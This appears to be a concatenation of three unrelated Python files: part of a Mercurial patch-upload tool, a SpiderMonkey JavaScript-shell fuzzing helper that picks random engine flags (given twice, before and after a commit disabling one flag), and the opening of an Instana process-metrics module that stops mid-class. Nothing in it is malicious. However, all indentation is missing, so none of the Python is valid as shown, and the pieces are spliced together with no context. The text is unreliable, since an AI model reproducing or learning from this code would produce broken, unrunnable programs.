else:
out = RunShell(["hg", "parents", "-q"], silent_ok=True).strip()
if not out:
# No revisions; use 0 to mean a repository with nothing.
out = "0:0"
self.base_rev = out.split(':')[1].strip()
def _GetRelPath(self, filename):
"""Get relative path of a file according to the current directory,
given its logical path in the repo."""
assert filename.startswith(self.subdir), (filename, self.subdir)
return filename[len(self.subdir):].lstrip(r"\/")
def GenerateDiff(self, extra_args):
# If no file specified, restrict to the current subdir
extra_args = extra_args or ["."]
cmd = ["hg", "diff", "--git", "-r", self.base_rev] + extra_args
data = RunShell(cmd, silent_ok=True)
svndiff = []
filecount = 0
for line in data.splitlines():
m = re.match("diff --git a/(\S+) b/(\S+)", line)
if m:
# Modify line to make it look like as it comes from svn diff.
# With this modification no changes on the server side are required
# to make upload.py work with Mercurial repos.
# NOTE: for proper handling of moved/copied files, we have to use
# the second filename.
filename = m.group(2)
svndiff.append("Index: %s" % filename)
svndiff.append("=" * 67)
filecount += 1
logging.info(line)
else:
svndiff.append(line)
if not filecount:
ErrorExit("No valid patches found in output from hg diff")
return "\n".join(svndiff) + "\n"
def GetUnknownFiles(self):
"""Return a list of files unknown to the VCS."""
args = []
status = RunShell(["hg", "status", "--rev", self.base_rev, "-u", "."],
silent_ok=True)
unknown_files = []
for line in status.splitlines():
st, fn = line.split(" ", 1)
if st == "?":
unknown_files.append(fn)
return unknown_files
def get_hg_status(self, rev, path):
# We'd like to use 'hg status -C path', but that is buggy
# (see http://mercurial.selenic.com/bts/issue3023).
# Instead, run 'hg status -C' without a path
# and skim the output for the path we want.
if self.status is None:
if use_hg_shell:
out = RunShell(["hg", "status", "-C", "--rev", rev])
else:
fui = FakeMercurialUI()
ret = hg_commands.status(fui, self.repo, *[], **{'rev': [rev], 'copies': True})
if ret:
raise hg_util.Abort(ret)
out = fui.output
self.status = out.splitlines()
for i in range(len(self.status)):
# line is
# A path
# M path
# etc
line = to_slash(self.status[i])
if line[2:] == path:
if i+1 < len(self.status) and self.status[i+1][:2] == ' ':
return self.status[i:i+2]
return self.status[i:i+1]
raise hg_util.Abort("no status for " + path)
def GetBaseFile(self, filename):
set_status("inspecting " + filename)
# "hg status" and "hg cat" both take a path relative to the current subdir
# rather than to the repo root, but "hg diff" has given us the full path
# to the repo root.
base_content = ""
new_content = None
is_binary = False
oldrelpath = relpath = self._GetRelPath(filename)
out = self.get_hg_status(self.base_rev, relpath)
status, what = out[0].split(' ', 1)
if len(out) > 1 and status == "A" and what == relpath:
oldrelpath = out[1].strip()
status = "M"
if ":" in self.base_rev:
base_rev = self.base_rev.split(":", 1)[0]
else:
base_rev = self.base_rev
if status != "A":
if use_hg_shell:
base_content = RunShell(["hg", "cat", "-r", base_rev, oldrelpath], silent_ok=True)
else:
base_content = str(self.repo[base_rev][oldrelpath].data())
is_binary = "\0" in base_content # Mercurial's heuristic
if status != "R":
new_content = open(relpath, "rb").read()
is_binary = is_binary or "\0" in new_content
if is_binary and base_content and use_hg_shell:
# Fetch again without converting newlines
base_content = RunShell(["hg", "cat", "-r", base_rev, oldrelpath],
silent_ok=True, universal_newlines=False)
if not is_binary or not self.IsImage(relpath):
new_content = None
return base_content, new_content, is_binary, status
# NOTE: The SplitPatch function is duplicated in engine.py, keep them in sync.
def SplitPatch(data):
"""Splits a patch into separate pieces for each file.
Args:
data: A string containing the output of svn diff.
Returns:
A list of 2-tuple (filename, text) where text is the svn diff output
pertaining to filename.
"""
patches = []
filename = None
diff = []
for line in data.splitlines(True):
new_filename = None
if line.startswith('Index:'):
unused, new_filename = line.split(':', 1)
new_filename = new_filename.strip()
elif line.startswith('Property changes on:'):
unused, temp_filename = line.split(':', 1)
# When a file is modified, paths use '/' between directories, however
# when a property is modified '\' is used on Windows. Make them the same
# otherwise the file shows up twice.
temp_filename = to_slash(temp_filename.strip())
if temp_filename != filename:
# File has property changes but no modifications, create a new diff.
new_filename = temp_filename
if new_filename:
if filename and diff:
patches.append((filename, ''.join(diff)))
filename = new_filename
diff = [line]
continue
if diff is not None:
diff.append(line)
if filename and diff:
patches.append((filename, ''.join(diff)))
return patches
def UploadSeparatePatches(issue, rpc_server, patchset, data, options):
"""Uploads a separate patch for each file in the diff output.
Returns a list of [patch_key, filename] for each file.
"""
patches = SplitPatch(data)
rv = []
for patch in patches:
set_status("uploading patch for " + patch[0])
if len(patch[1]) > MAX_UPLOAD_SIZE:
print ("Not uploading the patch for " + patch[0] +
" because the file is too large.")
continue
form_fields = [("filename", patch[0])]
if not options.download_base:
form_fields.append(("content_upload", "1"))
files = [("data", "data.diff", patch[1])]
ctype, body = EncodeMultipartFormData(form_fields, files)
url = "/%d/upload_patch/%d" % (int(issue), int(patchset))
print "Uploading patch for " + patch[0]
response_body = rpc_server.Send(url, body, content_type=ctype)
lines = response_body.splitlines()
if not lines or lines[0] != "OK":
StatusUpdate(" --> %s" % response_body)
sys.exit(1)
rv.append([lines[1], patch[0]])
return rv
|
import multiprocessing
import os
import random
import sys
import inspectShell
path0 = os.path.dirname(os.path.abspath(__file__))
path1 = os.path.abspath(os.path.join(path0, os.pardir, 'util'))
sys.path.append(path1)
import subprocesses as sps
def memoize(f, cache={}):
'''Function decorator that caches function results.'''
# From http://code.activestate.com/recipes/325205-cache-decorator-in-python-24/#c9
def g(*args, **kwargs):
key = (f, tuple(args), frozenset(kwargs.items()))
if key not in cache:
cache[key] = f(*args, **kwargs)
return cache[key]
return g
@memoize
def shellSupportsFlag(shellPath, flag):
return inspectShell.shellSupports(shellPath, [flag, '-e', '42'])
def chance(p):
return random.random() < p
def randomFlagSet(shellPath):
'''
Returns a random list of command-line flags appropriate for the given shell.
Only works for spidermonkey js shell. Does not work for xpcshell.
'''
args = []
ion = shellSupportsFlag(shellPath, "--ion") and chance(.8)
if shellSupportsFlag(shellPath, '--fuzzing-safe'):
args.append("--fuzzing-safe") # --fuzzing-safe landed in bug 885361
# See bug 932517, which had landed to fix this issue. Keeping this around for archives:
# Original breakage in m-c rev 269359 : https://hg.mozilla.org/mozilla-central/rev/a0ccab2a6e28
# Fix in m-c rev 269896: https://hg.mozilla.org/mozilla-central/rev/3bb8446a6d8d
# Anything in-between involving let probably needs "-e 'version(185);'" to see if we can bypass breakage
# if shellSupportsFlag(shellPath, "--execute='version(185);'"):
# args.append("--execute='version(185);'")
if shellSupportsFlag(shellPath, '--ion-sincos=on') and chance(.5):
sincosValue = "on" if chance(0.5) else "off"
args.append("--ion-sincos=" + sincosValue) # --ion-sincos=[on|off] landed in bug 984018
if shellSupportsFlag(shellPath, '--ion-instruction-reordering=on') and chance(.2):
args.append("--ion-instruction-reordering=on") # --ion-instruction-reordering=on landed in bug 1195545
if shellSupportsFlag(shellPath, '--ion-shared-stubs=on') and chance(.2):
args.append("--ion-shared-stubs=on") # --ion-shared-stubs=on landed in bug 1168756
if shellSupportsFlag(shellPath, '--non-writable-jitcode') and chance(.3):
args.append("--non-writable-jitcode") # --non-writable-jitcode landed in bug 977805
if shellSupportsFlag(shellPath, "--execute='setJitCompilerOption(\"ion.forceinlineCaches\", 1)'") and chance(.1):
args.append("--execute='setJitCompilerOption(\"ion.forceinlineCaches\", 1)'")
if shellSupportsFlag(shellPath, '--no-cgc') and chance(.1):
args.append("--no-cgc") # --no-cgc landed in bug 1126769
if shellSupportsFlag(shellPath, '--no-ggc') and chance(.1):
args.append("--no-ggc") # --no-ggc landed in bug 706885
if shellSupportsFlag(shellPath, '--no-incremental-gc') and chance(.1):
args.append("--no-incremental-gc") # --no-incremental-gc landed in bug 958492
if shellSupportsFlag(shellPath, '--no-unboxed-objects') and chance(.2):
args.append("--no-unboxed-objects") # --no-unboxed-objects landed in bug 1162199
#if shellSupportsFlag(shellPath, '--ion-sink=on') and chance(.2):
# args.append("--ion-sink=on") # --ion-sink=on landed in bug 1093674
if shellSupportsFlag(shellPath, '--gc-zeal=0') and chance(.9):
gczealValue = 14 if chance(0.5) else random.randint(0, 14) # Focus test compacting GC (14)
args.append("--gc-zeal=" + str(gczealValue)) # --gc-zeal= landed in bug 1101602
if shellSupportsFlag(shellPath, '--enable-small-chunk-size') and chance(.1):
args.append("--enable-small-chunk-size") # --enable-small-chunk-size landed in bug 941804
if shellSupportsFlag(shellPath, '--ion-loop-unrolling=on') and chance(.2):
args.append("--ion-loop-unrolling=on") # --ion-loop-unrolling=on landed in bug 1039458
if shellSupportsFlag(shellPath, '--no-threads') and chance(.5):
args.append("--no-threads") # --no-threads landed in bug 1031529
if shellSupportsFlag(shellPath, '--disable-ion') and chance(.05):
args.append("--disable-ion") # --disable-ion landed in bug 789319
# See bug 1026919 comment 60:
if sps.isARMv7l and \
shellSupportsFlag(shellPath, '--arm-asm-nop-fill=0') and chance(0.3):
# It was suggested to focus more on the range between 0 and 1.
# Reduced the upper limit to 8, see bug 1053996 comment 8.
asmNopFill = random.randint(1, 8) if chance(0.3) else random.randint(0, 1)
args.append("--arm-asm-nop-fill=" + str(asmNopFill)) # Landed in bug 1020834
# See bug 1026919 comment 60:
if sps.isARMv7l and \
shellSupportsFlag(shellPath, '--asm-pool-max-offset=1024') and chance(0.3):
asmPoolMaxOffset = random.randint(5, 1024)
args.append("--asm-pool-max-offset=" + str(asmPoolMaxOffset)) # Landed in bug 1026919
if shellSupportsFlag(shellPath, '--no-native-regexp') and chance(.1):
args.append("--no-native-regexp") # See bug 976446
if inspectShell.queryBuildConfiguration(shellPath, 'arm-simulator') and chance(.4):
args.append('--arm-sim-icache-checks')
if (shellSupportsFlag(shellPath, '--no-sse3') and shellSupportsFlag(shellPath, '--no-sse4')) and chance(.2):
# --no-sse3 and --no-sse4 landed in m-c rev 526ba3ace37a.
if chance(.5):
args.append("--no-sse3")
else:
args.append("--no-sse4")
if shellSupportsFlag(shellPath, '--no-fpu') and chance(.2):
args.append("--no-fpu") # --no-fpu landed in bug 858022
if shellSupportsFlag(shellPath, '--no-asmjs') and chance(.5):
args.append("--no-asmjs")
# --baseline-eager landed after --no-baseline on the IonMonkey branch prior to landing on m-c.
if shellSupportsFlag(shellPath, '--baseline-eager'):
if chance(.3):
args.append('--no-baseline')
# elif is important, as we want to call --baseline-eager only if --no-baseline is not set.
elif chance(.6):
args.append("--baseline-eager")
if shellSupportsFlag(shellPath, '--ion-offthread-compile=off'):
if chance(.7):
# Focus on the reproducible cases
args.append("--ion-offthread-compile=off")
elif chance(.5) and multiprocessing.cpu_count() > 1 and \
shellSupportsFlag(shellPath, '--thread-count=1'):
# Adjusts default number of threads for parallel compilation (turned on by default)
totalThreads = random.randint(2, (multiprocessing.cpu_count() * 2))
args.append('--thread-count=' + str(totalThreads))
# else:
# Default is to have --ion-offthread-compile=on and --thread-count=<some default value>
elif shellSupportsFlag(shellPath, '--ion-parallel-compile=off'):
# --ion-parallel-compile=off has gone away as of m-c rev 9ab3b097f304 and f0d67b1ccff9.
if chance(.7):
# Focus on the reproducible cases
args.append("--ion-parallel-compile=off")
elif chance(.5) and multiprocessing.cpu_count() > 1 and \
shellSupportsFlag(shellPath, '--thread-count=1'):
# Adjusts default number of threads for parallel compilation (turned on by default)
totalThreads = random.randint(2, (multiprocessing.cpu_count() * 2))
args.append('--thread-count=' + str(totalThreads))
# else:
# The default is to have --ion-parallel-compile=on and --thread-count=<some default value>
if ion:
if chance(.6):
args.append("--ion-eager")
if chance(.2):
args.append("--ion-gvn=off")
if chance(.2):
args.append("--ion-licm=off")
if shellSupportsFlag(shellPath, '--ion-edgecase-analysis=off') and chance(.2):
args.append("--ion-edgecase-analysis=off")
if chance(.2):
args.append("--ion-range-analysis=off")
if chance(.2):
args.append("--ion-inlining=off")
if chance(.2):
args.append("--ion-osr=off")
if chance(.2):
args.append("--ion-limit-script-size=off")
# Backtracking (on by default as of 2015-04-15) and stupid landed in m-c changeset dc4887f61d2e
# The stupid allocator isn't used by default and devs prefer not to have to fix fuzzbugs
#if shellSupportsFlag(shellPath, '--ion-regalloc=stupid') and chance(.2):
#args.append('--ion-regalloc=stupid')
if shellSupportsFlag(shellPath, '--ion-regalloc=testbed') and chance(.2):
args.append('--ion-regalloc=testbed')
if shellSupportsFlag(shellPath, '--ion-check-range-analysis'):
if chance(.3):
args.append('--ion-check-range-analysis')
if shellSupportsFlag(shellPath, '--ion-extra-checks'):
if chance(.3):
args.append('--ion-extra-checks')
else:
args.append("--no-ion")
#if chance(.05):
# args.append("--execute=verifyprebarriers()")
if chance(.05):
args.append("-D") # aka --dump-bytecode
return args
def basicFlagSets(shellPath):
'''
compareJIT uses these combinations of flags (as well as the original set of flags) when run
through Lithium and autoBisect.
'''
if shellSupportsFlag(shellPath, "--no-threads"):
basicFlagList = [
# Parts of this flag permutation come from:
# https://hg.mozilla.org/mozilla-central/file/e3bf27190360/js/src/tests/lib/tests.py#l12
['--fuzzing-safe', '--no-threads', '--ion-eager'], # compareJIT uses this first flag set as the sole baseline when fuzzing
['--fuzzing-safe', '--ion-offthread-compile=off', '--ion-eager'],
['--fuzzing-safe', '--ion-offthread-compile=off', '--baseline-eager'],
['--fuzzing-safe', '--no-threads', '--baseline-eager'],
['--fuzzing-safe', '--no-threads', '--baseline-eager', '--no-fpu'],
['--fuzzing-safe', '--no-threads', '--no-baseline', '--no-ion'],
['--fuzzing-safe', '--no-threads', '--no-ion'], # See bug 1203862
]
if shellSupportsFlag(shellPath, "--non-writable-jitcode"):
basicFlagList.append(['--fuzzing-safe', '--no-threads', '--ion-eager',
'--non-writable-jitcode', '--ion-check-range-analysis',
'--ion-extra-checks', '--no-sse3'])
return basicFlagList
elif shellSupportsFlag(shellPath, "--ion-offthread-compile=off"):
basicFlagList = [
# Parts of this flag permutation come from:
# https://hg.mozilla.org/mozilla-central/file/84bd8d9f4256/js/src/tests/lib/tests.py#l12
# as well as other interesting flag combinations that have found / may find new bugs.
['--fuzzing-safe', '--ion-offthread-compile=off'], # compareJIT uses this first flag set as the sole baseline when fuzzing
['--fuzzing-safe', '--ion-offthread-compile=off', '--no-baseline'], # Not in jit_test.py though...
['--fuzzing-safe', '--ion-offthread-compile=off', '--no-baseline', '--no-ion'],
['--fuzzing-safe', '--ion-offthread-compile=off', '--no-baseline', '--ion-eager'], # Not in jit_test.py though...
['--fuzzing-safe', '--ion-offthread-compile=off', '--ion-eager'], # Not in jit_test.py though...
['--fuzzing-safe', '--ion-offthread-compile=off', '--no-ion'], # Not in jit_test.py though, see bug 848906 comment 1
['--fuzzing-safe', '--ion-offthread-compile=off', '--no-fpu'],
]
if shellSupportsFlag(shellPath, "--thread-count=1"):
basicFlagList.append(['--fuzzing-safe', '--ion-offthread-compile=off', '--ion-eager'])
# Range analysis had only started to stabilize around the time when --no-sse3 landed.
if shellSupportsFlag(shellPath, '--no-sse3'):
basicFlagList.append(['--fuzzing-safe', '--ion-offthread-compile=off',
'--ion-eager', '--ion-check-range-analysis', '--no-sse3'])
return basicFlagList
else:
basicFlagList = [
# Parts of this flag permutation come from:
# https://hg.mozilla.org/mozilla-central/file/10932f3a0ba0/js/src/tests/lib/tests.py#l12
# as well as other interesting flag combinations that have found / may find new bugs.
['--fuzzing-safe', '--ion-parallel-compile=off'], # compareJIT uses this first flag set as the sole baseline when fuzzing
['--fuzzing-safe', '--ion-parallel-compile=off', '--no-baseline'], # Not in jit_test.py though...
['--fuzzing-safe', '--ion-parallel-compile=off', '--no-baseline', '--no-ion'],
['--fuzzing-safe', '--ion-parallel-compile=off', '--no-baseline', '--ion-eager'], # Not in jit_test.py though...
['--fuzzing-safe', '--ion-parallel-compile=off', '--ion-eager'], # Not in jit_test.py though...
['--fuzzing-safe', '--ion-parallel-compile=off', '--baseline-eager'],
['--fuzzing-safe', '--ion-parallel-compile=off', '--baseline-eager', '--no-ion'], # See bug 848906 comment 1
['--fuzzing-safe', '--ion-parallel-compile=off', '--baseline-eager', '--no-fpu'],
]
if shellSupportsFlag(shellPath, "--thread-count=1"):
basicFlagList.append(['--fuzzing-safe', '--ion-eager', '--ion-parallel-compile=off'])
# Range analysis had only started to stabilize around the time when --no-sse3 landed.
if shellSupportsFlag(shellPath, '--no-sse3'):
basicFlagList.append(['--fuzzing-safe', '--ion-parallel-compile=off',
'--ion-eager', '--ion-check-range-analysis', '--no-sse3'])
return basicFlagList
# Consider adding a function (for compareJIT reduction) that takes a flag set
# and returns all its (meaningful) subsets.
def testRandomFlags():
for _ in range(100):
print ' '.join(randomFlagSet(sys.argv[1]))
if __name__ == "__main__":
testRandomFlags()
Disable fuzzing with --ion-shared-stubs=on until bug 1226816 is fixed.
import multiprocessing
import os
import random
import sys
import inspectShell
path0 = os.path.dirname(os.path.abspath(__file__))
path1 = os.path.abspath(os.path.join(path0, os.pardir, 'util'))
sys.path.append(path1)
import subprocesses as sps
def memoize(f, cache={}):
'''Function decorator that caches function results.'''
# From http://code.activestate.com/recipes/325205-cache-decorator-in-python-24/#c9
def g(*args, **kwargs):
key = (f, tuple(args), frozenset(kwargs.items()))
if key not in cache:
cache[key] = f(*args, **kwargs)
return cache[key]
return g
@memoize
def shellSupportsFlag(shellPath, flag):
return inspectShell.shellSupports(shellPath, [flag, '-e', '42'])
def chance(p):
return random.random() < p
def randomFlagSet(shellPath):
'''
Returns a random list of command-line flags appropriate for the given shell.
Only works for spidermonkey js shell. Does not work for xpcshell.
'''
args = []
ion = shellSupportsFlag(shellPath, "--ion") and chance(.8)
if shellSupportsFlag(shellPath, '--fuzzing-safe'):
args.append("--fuzzing-safe") # --fuzzing-safe landed in bug 885361
# See bug 932517, which had landed to fix this issue. Keeping this around for archives:
# Original breakage in m-c rev 269359 : https://hg.mozilla.org/mozilla-central/rev/a0ccab2a6e28
# Fix in m-c rev 269896: https://hg.mozilla.org/mozilla-central/rev/3bb8446a6d8d
# Anything in-between involving let probably needs "-e 'version(185);'" to see if we can bypass breakage
# if shellSupportsFlag(shellPath, "--execute='version(185);'"):
# args.append("--execute='version(185);'")
if shellSupportsFlag(shellPath, '--ion-sincos=on') and chance(.5):
sincosValue = "on" if chance(0.5) else "off"
args.append("--ion-sincos=" + sincosValue) # --ion-sincos=[on|off] landed in bug 984018
if shellSupportsFlag(shellPath, '--ion-instruction-reordering=on') and chance(.2):
args.append("--ion-instruction-reordering=on") # --ion-instruction-reordering=on landed in bug 1195545
# Disabled until bug 1226816 is fixed.
# if shellSupportsFlag(shellPath, '--ion-shared-stubs=on') and chance(.2):
# args.append("--ion-shared-stubs=on") # --ion-shared-stubs=on landed in bug 1168756
if shellSupportsFlag(shellPath, '--non-writable-jitcode') and chance(.3):
args.append("--non-writable-jitcode") # --non-writable-jitcode landed in bug 977805
if shellSupportsFlag(shellPath, "--execute='setJitCompilerOption(\"ion.forceinlineCaches\", 1)'") and chance(.1):
args.append("--execute='setJitCompilerOption(\"ion.forceinlineCaches\", 1)'")
if shellSupportsFlag(shellPath, '--no-cgc') and chance(.1):
args.append("--no-cgc") # --no-cgc landed in bug 1126769
if shellSupportsFlag(shellPath, '--no-ggc') and chance(.1):
args.append("--no-ggc") # --no-ggc landed in bug 706885
if shellSupportsFlag(shellPath, '--no-incremental-gc') and chance(.1):
args.append("--no-incremental-gc") # --no-incremental-gc landed in bug 958492
if shellSupportsFlag(shellPath, '--no-unboxed-objects') and chance(.2):
args.append("--no-unboxed-objects") # --no-unboxed-objects landed in bug 1162199
#if shellSupportsFlag(shellPath, '--ion-sink=on') and chance(.2):
# args.append("--ion-sink=on") # --ion-sink=on landed in bug 1093674
if shellSupportsFlag(shellPath, '--gc-zeal=0') and chance(.9):
gczealValue = 14 if chance(0.5) else random.randint(0, 14) # Focus test compacting GC (14)
args.append("--gc-zeal=" + str(gczealValue)) # --gc-zeal= landed in bug 1101602
if shellSupportsFlag(shellPath, '--enable-small-chunk-size') and chance(.1):
args.append("--enable-small-chunk-size") # --enable-small-chunk-size landed in bug 941804
if shellSupportsFlag(shellPath, '--ion-loop-unrolling=on') and chance(.2):
args.append("--ion-loop-unrolling=on") # --ion-loop-unrolling=on landed in bug 1039458
if shellSupportsFlag(shellPath, '--no-threads') and chance(.5):
args.append("--no-threads") # --no-threads landed in bug 1031529
if shellSupportsFlag(shellPath, '--disable-ion') and chance(.05):
args.append("--disable-ion") # --disable-ion landed in bug 789319
# See bug 1026919 comment 60:
if sps.isARMv7l and \
shellSupportsFlag(shellPath, '--arm-asm-nop-fill=0') and chance(0.3):
# It was suggested to focus more on the range between 0 and 1.
# Reduced the upper limit to 8, see bug 1053996 comment 8.
asmNopFill = random.randint(1, 8) if chance(0.3) else random.randint(0, 1)
args.append("--arm-asm-nop-fill=" + str(asmNopFill)) # Landed in bug 1020834
# See bug 1026919 comment 60:
if sps.isARMv7l and \
shellSupportsFlag(shellPath, '--asm-pool-max-offset=1024') and chance(0.3):
asmPoolMaxOffset = random.randint(5, 1024)
args.append("--asm-pool-max-offset=" + str(asmPoolMaxOffset)) # Landed in bug 1026919
if shellSupportsFlag(shellPath, '--no-native-regexp') and chance(.1):
args.append("--no-native-regexp") # See bug 976446
if inspectShell.queryBuildConfiguration(shellPath, 'arm-simulator') and chance(.4):
args.append('--arm-sim-icache-checks')
if (shellSupportsFlag(shellPath, '--no-sse3') and shellSupportsFlag(shellPath, '--no-sse4')) and chance(.2):
# --no-sse3 and --no-sse4 landed in m-c rev 526ba3ace37a.
if chance(.5):
args.append("--no-sse3")
else:
args.append("--no-sse4")
if shellSupportsFlag(shellPath, '--no-fpu') and chance(.2):
args.append("--no-fpu") # --no-fpu landed in bug 858022
if shellSupportsFlag(shellPath, '--no-asmjs') and chance(.5):
args.append("--no-asmjs")
# --baseline-eager landed after --no-baseline on the IonMonkey branch prior to landing on m-c.
if shellSupportsFlag(shellPath, '--baseline-eager'):
if chance(.3):
args.append('--no-baseline')
# elif is important, as we want to call --baseline-eager only if --no-baseline is not set.
elif chance(.6):
args.append("--baseline-eager")
if shellSupportsFlag(shellPath, '--ion-offthread-compile=off'):
if chance(.7):
# Focus on the reproducible cases
args.append("--ion-offthread-compile=off")
elif chance(.5) and multiprocessing.cpu_count() > 1 and \
shellSupportsFlag(shellPath, '--thread-count=1'):
# Adjusts default number of threads for parallel compilation (turned on by default)
totalThreads = random.randint(2, (multiprocessing.cpu_count() * 2))
args.append('--thread-count=' + str(totalThreads))
# else:
# Default is to have --ion-offthread-compile=on and --thread-count=<some default value>
elif shellSupportsFlag(shellPath, '--ion-parallel-compile=off'):
# --ion-parallel-compile=off has gone away as of m-c rev 9ab3b097f304 and f0d67b1ccff9.
if chance(.7):
# Focus on the reproducible cases
args.append("--ion-parallel-compile=off")
elif chance(.5) and multiprocessing.cpu_count() > 1 and \
shellSupportsFlag(shellPath, '--thread-count=1'):
# Adjusts default number of threads for parallel compilation (turned on by default)
totalThreads = random.randint(2, (multiprocessing.cpu_count() * 2))
args.append('--thread-count=' + str(totalThreads))
# else:
# The default is to have --ion-parallel-compile=on and --thread-count=<some default value>
if ion:
if chance(.6):
args.append("--ion-eager")
if chance(.2):
args.append("--ion-gvn=off")
if chance(.2):
args.append("--ion-licm=off")
if shellSupportsFlag(shellPath, '--ion-edgecase-analysis=off') and chance(.2):
args.append("--ion-edgecase-analysis=off")
if chance(.2):
args.append("--ion-range-analysis=off")
if chance(.2):
args.append("--ion-inlining=off")
if chance(.2):
args.append("--ion-osr=off")
if chance(.2):
args.append("--ion-limit-script-size=off")
# Backtracking (on by default as of 2015-04-15) and stupid landed in m-c changeset dc4887f61d2e
# The stupid allocator isn't used by default and devs prefer not to have to fix fuzzbugs
#if shellSupportsFlag(shellPath, '--ion-regalloc=stupid') and chance(.2):
#args.append('--ion-regalloc=stupid')
if shellSupportsFlag(shellPath, '--ion-regalloc=testbed') and chance(.2):
args.append('--ion-regalloc=testbed')
if shellSupportsFlag(shellPath, '--ion-check-range-analysis'):
if chance(.3):
args.append('--ion-check-range-analysis')
if shellSupportsFlag(shellPath, '--ion-extra-checks'):
if chance(.3):
args.append('--ion-extra-checks')
else:
args.append("--no-ion")
#if chance(.05):
# args.append("--execute=verifyprebarriers()")
if chance(.05):
args.append("-D") # aka --dump-bytecode
return args
def basicFlagSets(shellPath):
'''
compareJIT uses these combinations of flags (as well as the original set of flags) when run
through Lithium and autoBisect.
'''
if shellSupportsFlag(shellPath, "--no-threads"):
basicFlagList = [
# Parts of this flag permutation come from:
# https://hg.mozilla.org/mozilla-central/file/e3bf27190360/js/src/tests/lib/tests.py#l12
['--fuzzing-safe', '--no-threads', '--ion-eager'], # compareJIT uses this first flag set as the sole baseline when fuzzing
['--fuzzing-safe', '--ion-offthread-compile=off', '--ion-eager'],
['--fuzzing-safe', '--ion-offthread-compile=off', '--baseline-eager'],
['--fuzzing-safe', '--no-threads', '--baseline-eager'],
['--fuzzing-safe', '--no-threads', '--baseline-eager', '--no-fpu'],
['--fuzzing-safe', '--no-threads', '--no-baseline', '--no-ion'],
['--fuzzing-safe', '--no-threads', '--no-ion'], # See bug 1203862
]
if shellSupportsFlag(shellPath, "--non-writable-jitcode"):
basicFlagList.append(['--fuzzing-safe', '--no-threads', '--ion-eager',
'--non-writable-jitcode', '--ion-check-range-analysis',
'--ion-extra-checks', '--no-sse3'])
return basicFlagList
elif shellSupportsFlag(shellPath, "--ion-offthread-compile=off"):
basicFlagList = [
# Parts of this flag permutation come from:
# https://hg.mozilla.org/mozilla-central/file/84bd8d9f4256/js/src/tests/lib/tests.py#l12
# as well as other interesting flag combinations that have found / may find new bugs.
['--fuzzing-safe', '--ion-offthread-compile=off'], # compareJIT uses this first flag set as the sole baseline when fuzzing
['--fuzzing-safe', '--ion-offthread-compile=off', '--no-baseline'], # Not in jit_test.py though...
['--fuzzing-safe', '--ion-offthread-compile=off', '--no-baseline', '--no-ion'],
['--fuzzing-safe', '--ion-offthread-compile=off', '--no-baseline', '--ion-eager'], # Not in jit_test.py though...
['--fuzzing-safe', '--ion-offthread-compile=off', '--ion-eager'], # Not in jit_test.py though...
['--fuzzing-safe', '--ion-offthread-compile=off', '--no-ion'], # Not in jit_test.py though, see bug 848906 comment 1
['--fuzzing-safe', '--ion-offthread-compile=off', '--no-fpu'],
]
if shellSupportsFlag(shellPath, "--thread-count=1"):
basicFlagList.append(['--fuzzing-safe', '--ion-offthread-compile=off', '--ion-eager'])
# Range analysis had only started to stabilize around the time when --no-sse3 landed.
if shellSupportsFlag(shellPath, '--no-sse3'):
basicFlagList.append(['--fuzzing-safe', '--ion-offthread-compile=off',
'--ion-eager', '--ion-check-range-analysis', '--no-sse3'])
return basicFlagList
else:
basicFlagList = [
# Parts of this flag permutation come from:
# https://hg.mozilla.org/mozilla-central/file/10932f3a0ba0/js/src/tests/lib/tests.py#l12
# as well as other interesting flag combinations that have found / may find new bugs.
['--fuzzing-safe', '--ion-parallel-compile=off'], # compareJIT uses this first flag set as the sole baseline when fuzzing
['--fuzzing-safe', '--ion-parallel-compile=off', '--no-baseline'], # Not in jit_test.py though...
['--fuzzing-safe', '--ion-parallel-compile=off', '--no-baseline', '--no-ion'],
['--fuzzing-safe', '--ion-parallel-compile=off', '--no-baseline', '--ion-eager'], # Not in jit_test.py though...
['--fuzzing-safe', '--ion-parallel-compile=off', '--ion-eager'], # Not in jit_test.py though...
['--fuzzing-safe', '--ion-parallel-compile=off', '--baseline-eager'],
['--fuzzing-safe', '--ion-parallel-compile=off', '--baseline-eager', '--no-ion'], # See bug 848906 comment 1
['--fuzzing-safe', '--ion-parallel-compile=off', '--baseline-eager', '--no-fpu'],
]
if shellSupportsFlag(shellPath, "--thread-count=1"):
basicFlagList.append(['--fuzzing-safe', '--ion-eager', '--ion-parallel-compile=off'])
# Range analysis had only started to stabilize around the time when --no-sse3 landed.
if shellSupportsFlag(shellPath, '--no-sse3'):
basicFlagList.append(['--fuzzing-safe', '--ion-parallel-compile=off',
'--ion-eager', '--ion-check-range-analysis', '--no-sse3'])
return basicFlagList
# Consider adding a function (for compareJIT reduction) that takes a flag set
# and returns all its (meaningful) subsets.
def testRandomFlags():
for _ in range(100):
print ' '.join(randomFlagSet(sys.argv[1]))
if __name__ == "__main__":
testRandomFlags()
|
import threading as t
import instana.log as l
import resource
import os
import gc as gc_
import sys
import instana.agent_const as a
import copy
import time
import json
from types import ModuleType
class Snapshot(object):
name = None
version = None
rlimit_core = (0, 0)
rlimit_cpu = (0, 0)
rlimit_fsize = (0, 0)
rlimit_data = (0, 0)
rlimit_stack = (0, 0)
rlimit_rss = (0, 0)
rlimit_nproc = (0, 0)
rlimit_nofile = (0, 0)
rlimit_memlock = (0, 0)
rlimit_as = (0, 0)
versions = None
def __init__(self, **kwds):
self.__dict__.update(kwds)
def to_dict(self):
kvs = dict()
kvs['name'] = self.name
kvs['version'] = self.version
kvs['versions'] = self.versions
return kvs
class GC(object):
collect0 = 0
collect1 = 0
collect2 = 0
threshold0 = 0
threshold1 = 0
threshold2 = 0
def __init__(self, **kwds):
self.__dict__.update(kwds)
def to_dict(self):
return self.__dict__
class Metrics(object):
ru_utime = .0
ru_stime = .0
ru_maxrss = 0
ru_ixrss = 0
ru_idrss = 0
ru_isrss = 0
ru_minflt = 0
ru_majflt = 0
ru_nswap = 0
ru_inblock = 0
ru_oublock = 0
ru_msgsnd = 0
ru_msgrcv = 0
ru_nsignals = 0
ru_nvcs = 0
ru_nivcsw = 0
dead_threads = 0
alive_threads = 0
daemon_threads = 0
gc = None
def __init__(self, **kwds):
self.__dict__.update(kwds)
def delta_data(self, delta):
data = self.__dict__
if delta is None:
return data
unchanged_items = set(data.items()) & set(delta.items())
for x in unchanged_items:
data.pop(x[0])
return data
def to_dict(self):
return self.__dict__
class EntityData(object):
pid = 0
snapshot = None
metrics = None
def __init__(self, **kwds):
self.__dict__.update(kwds)
def to_dict(self):
return self.__dict__
class Meter(object):
SNAPSHOT_PERIOD = 600
snapshot_countdown = 35
sensor = None
last_usage = None
last_collect = None
timer = None
